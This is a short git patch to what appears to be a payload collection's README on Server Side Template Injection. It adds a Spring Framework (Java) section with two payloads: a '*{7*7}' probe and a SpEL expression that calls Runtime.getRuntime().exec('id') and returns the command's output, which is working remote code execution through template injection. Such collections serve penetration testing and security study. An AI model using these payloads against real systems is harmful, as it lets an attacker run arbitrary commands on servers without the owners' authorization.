From b672771a1b2fdb6bad78a80ac59057e072fe9b29 Mon Sep 17 00:00:00 2001 From: OddRabbit <52036269+oddrabbit@users.noreply.github.com> Date: Fri, 28 Oct 2022 00:07:26 +1100 Subject: [PATCH] Update README.md --- Server Side Template Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 656dc05b..0b5208a4 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -879,6 +879,15 @@ Execute code using SSTI for Slim engine. --- +## Spring Framework (Java) + +``` +*{7*7} +*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())} +``` + +--- + ## Twig [Official website](https://twig.symfony.com/)